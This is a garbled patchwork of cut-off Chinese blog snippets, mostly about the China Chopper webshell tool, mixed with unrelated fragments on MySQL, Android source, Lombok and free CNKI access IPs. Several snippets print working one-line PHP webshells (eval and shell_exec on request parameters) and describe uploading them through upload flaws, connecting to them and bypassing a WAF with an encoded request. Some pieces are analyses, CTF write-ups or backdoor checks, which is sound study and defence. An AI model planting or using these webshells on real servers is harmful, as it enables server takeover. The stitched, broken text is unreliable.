0x00 中国制造, 黑客之刀 中国菜刀是中国安全圈内使用非常广泛的一款Webshell管理工具,此次老兵大牛进行了更新,界面更加优美,功能更加丰富,有图有真相! 0x01 验证 此次更新还自带了官网验证功能,妈妈再也不会担心我的webshell了. 0x02 软件说明 菜刀 / Caidao @ http://www.maicaidao.com/ 1 菜刀,他是一款专业的网站管理工具 一.网站管理模块 (1)放在网站上的脚本程序分两种 1.1)“一句话(Eval)”: PHP, ASP, AS…

这里的中国菜刀不是指切菜做饭的工具,而是中国安全圈内使用非常广泛的一款Webshell管理工具,想买菜刀请出门左拐东门菜市场王铁匠处.中国菜刀用途十分广泛,支持多种语言,小巧实用,据说是一位中国军人退伍之后的作品.日前,国外安全公司Fireeye对这款工具进行了详细的剖析,可以说是一部非常nice的菜刀使用教程. 分析 中国菜刀的客户端可在www.maicaidao.com下载到. Web shell (CnC) Client MD5 caidao.exe 5001ef50c7e869253a7…

中国菜刀 国产神器…

webshell 本质:<?php echo shell_exec($_GET['cmd']);?> windows平台 中国菜刀官网:胖客户端程序,国产中比较优秀的webshell,适用性较强 [但版本众多而乱,可能存在木马,据说的官网http://www.maicaidao.co/] 1.利用上传漏洞,先上传一句话木马[支持三种服务器端PHP.ASP.ASP.NET] 使用ssh连接metasploitable 创建包含木马代码的文件 2.连接相应的服务器端 添加服务器端URL [密码为一…

八.中国菜刀,不再web里? 下载文件后解压,是一个数据包,用wireshark打开,题中说的是菜刀,那就找http协议,首先过滤出http协议包 在第四个里面找到一句话木马 Flag应该在木马之后拿到的,所以找下一个http包,追踪一下流 发现base64编码,解码一下,最后两个%3D是两个=,改过来 从代码里可以看到传输文件是flag.tar.gz,前后还有字符“X@Y”,在下一个包里,找到对应数据,对其显示数据分组字节 把前后的X@Y删去,解码为压缩格式 得到flag…

以下是Free9免费资源网小编收集整理的2015年最新中国知网CNKI免费账号直接入口,现免费分享给大家(仅供测试使用),此类文献数据库资源有时效性,希望对您的学习.工作上有所帮助! 中国知网直接入口地址:http://124.93.245.86/kns55/http://58.132.133.132/Kns55http://118.122.51.20/kns55/http://58.132.9.109/kns50/index.aspx 长春建筑学院登录知网后(http://www.cnki.n…

Android最新源码4.3下载-教程 有的下载会出现问题: 需要 修改manifest.xml中的fetch: "git://Android.git.linaro.org/"  因为默认的是"..." ----> 我想再没有比能成功下载了Android源码更让Android开发人员兴奋的事情了-----前后折腾了近3个周,就不贴图了吧,毕竟下载实现的案例.图例有很多了,咱直接来下载过程展示. 为了下载纯正的Android源码,开始在虚拟机的Ubuntu中下载…

如果你的不是最新的,去这里下载最新版的,先点击左上角的Download红方块,然后再点击下图中的位置 https://projectlombok.org/ 下载完后把eclipse关掉,双击下载的jar包 如果列表里有你的eclipse,就直接选中后点Install/up,如果没有 就点Specify打开eclipse的安装目录(有eclipse.exe文件的那个文件夹),然后再点Install/up 最后把那个jar包导入到项目里…

介绍 经典标题党,中国菜刀有大牛已经分析过了->传送门(http://blog.csdn.net/p656456564545/article/details/49671829).博主PHP刚接触,所以有了下文... 0x00  菜 关于一句话木马肯定是眼熟能详,一句话木马如下: <?PHP eval($_GET[w]);?> 0x01  刀 一把西瓜刀如下: # -*-coding=utf-8-*- #!/usr/bin/env python import sys import requ…

在第一部分,简单描述了中国菜刀的基本功能.本文我将剖析中国菜刀的平台多功能性.传输机制.交互模式和检测.我希望通过我的讲解,您能够根据您的环境检测出并清除它. 平台 那么中国菜刀可以在哪些平台上运行?答案是任何能够运行JSP.ASP.ASPX.PHP.CFM的Web服务器.这些是大多数Web应用程序语言.那么操作系统呢?中国菜刀足够灵活,可以在Windows和Linux上运行.这种操作系统和应用程序的灵活性使其成为一个更危险的Web shell. 在本系列的第一部分中,我们展示了使用ASPX在W…

什么叫做一句话木马:     就是一句简单的脚本语言,一句话木马分为Php,asp,aspx等 中国菜刀:   连接一句话木马的工具 实验的目的:  通过一句话木马来控制我们的服务器,拿到webshell. 实验环境说明:   上传一句话木马到网站的根目录下: 然后通过中国菜刀连接: 获取wensell ,文件目录等等:…

使用工具: 中国菜刀 一句话php木马 <?php @eval($_POST['123456']);?> 第一步,将php木马上传至服务器,为了方便我就直接在服务器上建立. [root@proxy html]# vim .php <?php @eval($_POST[']);?> 第二步,打开中国菜刀配置,密码为123456 点击确定之后,无其他问题,即可成功. 右键点击该链接,选择文件管理,即可查看到服务器的文件目录 接下来..不用说了…

中国国内可用API合集 笔记 OneNote - OneNote支持获取,复制,创建,更新,导入与导出笔记,支持为笔记添加多媒体内容,管理权限等.提供SDK和Demo. 为知笔记 - 为知笔记Windows客户端开放了大量的API,其中绝大部分,都通过COM提供,可以在javascript, C#, C++, Delphi等语言中使用.接口通过IDL(Interface description language)语言描述. 印象笔记 - 印象笔记提供了ActionScript 3, Androi…

获取中国IP段办法     1.到APNIC获取亚太最新IP分配 http://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest     2.全选复制保存为IP.tx             t     3.用EXCEL打开IP.txt,弹出导入窗口         3.1选择'分隔符号'         3.2 分隔符号为'|'         3.3 完成     4.筛选数据         4.1 全选数据后'筛选'出CN和ip…

其实使用doxygen在Cocos2d-x引擎的doc目录下可以生成离线文档,但是可能每个人为了生成一个离线文档去安装甚至编译doxygen毕竟麻烦,而且现有的doxygen无法生成多语言版本的离线文档.所以为了大家用起Cocos2d-x更方便,在子龙山人的帮助下,我把最新多语言版Cocos2d-x的离线文档给整理出来了. 特点: 1.版本:使用最新的2.x版本和3.x版本. 2.语言:右上角选择C++/JS/Lua即可进行语言切换. 3.跨平台:这里没有使用chm等其他格式,而是直接使用了ht…

为了避免自己辛辛苦苦拿下的站点被一些拿来主义者不费吹灰之力就据为己有,下面来教大家如何检测菜刀有没有留后门. 对于有没有后门这个问题,大牛们会说抓包看一下就行了,那如何抓包呢?有很多软件可以,这里使用的是Fiddler2(免费,E文,下载地址请问谷歌).另外由于菜刀本身不支持代理,所以我们需要一款软件中转一下,这里用的是Proxifier. 以上两款软件的下载.安装.配置过程略. 首先,设置Proxifier,配置文件 - 代理服务器,添加你的本地代理,Fiddler2默认是127.0.0.1:…

        因mysql5.0上运行函数不行,决定安装最新版本号的mysql,在网上找了些绿色版的.安装总报1067错误,网上的各种方法都试了,就是不行.浪费时间不说.郁闷死了,最后决定去官网,官网上面有msi安装版和绿色版.必须注冊下,才干进行以下的操作.因之前绿色版安装老报1067错,决定使用安装版.可是 进入到MSI下载页面(http://dev.mysql.com/downloads/installer/5.6.html) watermark/2/text/aHR0cDovL2Jsb…

最新JetBrains PyCharm 下载安装Python库 ​…

中华人民共和国行政区划代码 中华人民共和国行政区划(五级):省级.地级.县级.乡级和村级. 来自中华人民共和国民政部,用于查询中国省,市和区数据的网站. 中华人民共和国行政区划代码,更新时间:2019-11-25 统计用区划和城乡划分代码,更新时间:2019-01-31 Github: https://github.com/uiwjs/province-city-china 数据更新 Diff 数据更新 2019-11-25 数据更新 2019-11-05 数据更新 2019-06-21 安装…

文章更新于:2020-04-11 按照惯例,需要的文件附上链接放在文首. 文件一: antSword-2.1.8.1.zip.7z 文件大小: 14.3 MB 下载链接: 中国蚁剑 v2.1.8.1 源码 antSword-2.1.8.1.zip.7z 注: 下面的 Hash 为解压后里面那个 zip 压缩包的 Hash值 MD5: 86f8782319ee8ae30598661b785687d5 SHA256: 02EB59B190D00E0B21772B9B994FFE6D84BC90478…

官方建议AFN的使用方法   0.导入框架准备工作 •1. 将AFNetworking3.0+框架程序拖拽进项目   •2. 或使用Cocopod 导入AFNetworking3.0+   •3.  引入 #import "AFNetworking.h" ----> 1.UI准备工作 A. 定义一个全局的 NSURLSessionDownloadTask:下载管理句柄    由其负责所有的网络操作请求 @interface ViewController () { // 下载句柄…

深度技术ghost win7系统 64位快速安装版 V2016年2月,深度技术ghost win7 64位快速安装版在不影响大多数软件和硬件运行的前提下,已经尽可能关闭非必要服务,自动安装AMD/Intel 双核 CPU 驱动和优化程序,发挥新平台的最大性能.首次登陆桌面,后台自动判断和执行清理目标机器残留的病毒信息,以杜绝病毒残留,改良的封装技术,更完善的驱动处理方式,极大减少“内存不能为read”现象,系统添加大量SATA控制器驱动,支持新式主板.高端笔记本.系统经过优化,启动服务经过仔细筛…

0x01 简单分析 web渗透中很常见的情况,用菜刀连接免杀的一句话木马连不上,有waf 除了变形一句话木马为免杀一句话,我们还需要来制作过waf的菜刀进行连接. 这里用的一句话为 来看看菜刀连接一句话的时候的包 x=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F…

1.打开百度搜索[Myql],或直达官网https://dev.mysql.com/ 2.点选[Download按钮],跳转到下载页面,拉到底部再点选[Community Download]社区版[免费版] 3.点选[MySQL Community Downloads]页面下的[Download]按钮跳转到[Download MySQL Community Server] 4.再次拉到底部,选择合适的选项进行下载.msi格式是微软的exe程序,这种安装包就是那种你可以一路"next"点…

中华人民共和国国家统计局>> 行政区划代码>>mysql数据格式 截图如下 行政区划mysql数据库文件下载:nation.zip 转载:http://www.sdhack.com/20151530.html…

https://downloads.mongodb.com/win32/mongodb-win32-x86_64-enterprise-windows-64-3.2.9.zip?_ga=1.225385299.891293472.1472345569 https://downloads.mongodb.com/win32/mongodb-win32-x86_64-enterprise-windows-64-3.2.9-signed.msi?_ga=1.225385299.891293472.14…

解压之后得到了一个流量包,只有不到10KB,美滋滋 先抓重点,过滤出http,只有6条数据记录,3条post,3条response,3条post都是一样的 随便打开一条pos 是一个assert断言,断言内容是一串base64加密的字符串(最后的%3D先解码为=) 得到了一串php代码 @ini_set("display_errors","0"); @set_time_limit(0); if(PHP_VERSION<\'5.3.0\') { @set_mag…

weevely是一个kali中集成的webshell工具,是webshell的生成和连接集于一身的轻量级工具,生成的后门隐蔽性比较好,是随机生成的参数并且加密的,唯一的遗憾是只支持php,weevely是交互性工具,只可以在命令终端执行. weevely generate password/tmp/1.php #生成一个名为1.php的后门,密码为password 这是生成后的php后门,是base64加密过后的. 将此后门上传到网站,用weevely连接,连接后面直接跟上设置的密码 weeve…

其他网站开发相关资料            超强HTML和xhtml,CSS精品学习资料下载汇总                                               最新html5以及css3资源下载汇总                                               Dreamweaver 教程汇总 索引: JavaScript初学者及参考必备 Javascript高级进阶 AJAX (Asynchronous JavaScript and…

背景 由于敏捷开发,快速迭代,我们项目一天会有三个版本,也就意味着我一天要去获取三次软件包.我负责服务端开发,所以我经常需要去拿最新的客户端.我们的客户端放置在一个公共的ftp上面.每天频繁登陆ftp下载,或者使用ftp工具,每次都要点击同步,都不太方便.如果在linux下就好了,然而在windows也是可以运行脚本的,何不尝试下呢. 完整代码 @echo off rem for download file rem ftp config rem ip login_name password re…